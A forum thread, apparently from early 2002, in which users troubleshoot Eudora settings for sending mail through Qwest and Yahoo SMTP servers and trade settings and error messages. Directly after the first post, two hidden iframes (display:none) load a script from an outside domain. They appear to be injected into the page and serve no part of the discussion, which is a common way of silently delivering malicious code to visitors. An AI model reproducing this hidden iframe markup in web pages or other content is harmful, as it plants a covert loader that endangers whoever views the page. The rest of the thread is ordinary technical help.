+ Reply to Thread
Page 1 of 2 1 2 LastLast

Error while sending messsage in Endora

I can receive message from Endora but when I try to send a message using Endora via Qwest I get a error that the message "cannot be sent" due to an error. My (POP) is pop.phnx.qwest.net. My (SMTP) is also the same. Do I have something set up wrong?

Larry <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

you mean "Eudora" right? Isnt your smtp server address supposed to be smtp.phnx.qwest.net? I didnt know a pop and smtp server address could be the same. try smtp.phnx.qwest.net adn see what happens. you got nothin to lose.

Administrator

Arrow

yeah, smtp should be outgoing...

also, to a check before send in eudora.

SMPT

I would agree but my desk top PC has it setup with both being POP. I just tried it with changing the outgoing to SMPT and it give me a error. You can take a look at this site from Qwest a about the SMPT server http://my.qwest.net/nav4/acct_tools/...g.html#arizona
    The Error that I get is just at the point that the progrm is sending the messgae. It is able to Establish a connection and logs on
    Thanks!
    Larry
    Last edited by llicht; 01-01-2002 at 10:26 AM.

Administrator

Arrow

does it give you a error message or just says "error"?

Nop Just error. the error happens just when it is negotiation to send the message. it then pops up with the word error and stops.

Thanks

Larry
    Last edited by llicht; 01-01-2002 at 11:12 AM.

Administrator

Arrow

do you have any other email addys set up in eudora? its possibile that eudora does not like that smtp. i tried to put one of my roadrunner accounts into eudora and it did not like it.. i do believe i got the same error you did. my yahoo worked on it without any problems...

No I have know other eamil address at this time. If I was to change to yahoo, waht would the server name be? If I woudl setup a yahoo account then I could use eudora to access it?

Larry

OK I give up Qwest won and I lost. Now I have tried yahoo mail/
    I used pop.mail.yahoo.com as my incomming server
    smtp.mail.yahoo.com as my out going mail

What should I set my security to Best Available? and for outgoing Login?

Larry

Beleive it or not I still cannot send or receive mail on Yahoo mail/ I get the following error.
    SMTP.mail.yahoo.com failed to auth failed.SMTP.mail.yahoo.com failed to auth failed It also says that it failed pop.mail.yahoo.com also
    Last edited by llicht; 01-01-2002 at 01:03 PM.

What ever I do it will not let me sign into yahoo mail. It says that it failed Pop.mail.yahoo.com auth.

Larry

Yahoo problems

I too am unable to connect with Yahoo mail thru Eudora. With the following settings:
    Pop: pop.mail.yahoo.com
    SMTP: smtp.mail.yahoo.com

I get as far as "logging in" and then get a "user/password" error. I've double checked all entries and all appear to be correct. Can anyone verify the pop and smtp are correct for yahoo? Thanks in advance.

Administrator

Arrow

simply set the secruity setting to "dont authenticate" if your using eudora 2.1 with SSL. thats the problem.

also, if you want to use yahoo then make sure (after you set it up in eudora) that you do a "check then send". this way *Yahoo* will know who you are and let you use its servers..

yes you can use yahoo on eudora.. i havbe been using yahoo for years!!!!
    Last edited by Marctronixx; 01-01-2002 at 03:46 PM.

Make sure your return email address is the yahoo one. I hear that if you use a different one, yahoo will not let you send. Also, when you were using the Qwest account in Eudora and couldn't send, when you tried to send, did you use the "send and check" option or the "send" option? Several smtp servers will not let you send email if you use the "send" option but will let you send if you use the "send and check" option in Eudora.

I jsut got off the phone with Sprint and did not make much progress. They will be calling me back on monday. It is really wild, everyone you speal to at sprint gives you a different story. Let me know if you have any luck

Larry

Administrator

Arrow

dont waste your time with sprint....

read my previous post and see if that cures the problem...

Yes I used both all of them SEND, CHECK MAIL, SEND & CHECK MAIL. The CHECK NAIL works and receives my waiting messages but any of the others fail when they try to connect to the SMTP server. Also my return addtess is a yahoo address
    I did find a interesting items on yahoo:

If you set the "outgoing Mail (SMTP) server field in yahoo mail to smtp.mail.yahoo.com and find that you cann receive but cannot send messages you may have to use your ISP server address rather than Yahoo's.

Larry

Marctronixx!!!

That did it!!!!!!!!!!! you are a Genius!!!

Thanks so much

Well that's the equivalent of saying "if ours doesn't work, find your own." Pretty much the same as Sprint's stance except Sprint tells you straight up to find your own since they don't offer a smtp server for their customers. Also, have you tried creating a dialup to your qwest account on the I300? If you can set that up, you will almost surely be able to send email on your I300 using the qwest server.

simply set the secruity setting to "dont authenticate" if your using eudora 2.1 with SSL. thats the problem.

Sorry, folks but I still can't make it work. I keep erring out on the login authentication. I only have "don't authenticate" option under SMTP but that still didn't work. I tried various combos on the security tab with no luck. Could I trouble llicht for your exact settings on each option? This is really getting frustrating. Aslo, user name should be XXXX@yahoo.com or just XXXXX. My error is always "Invalid user/password" I must be missing the obvious!!!
    Thanks!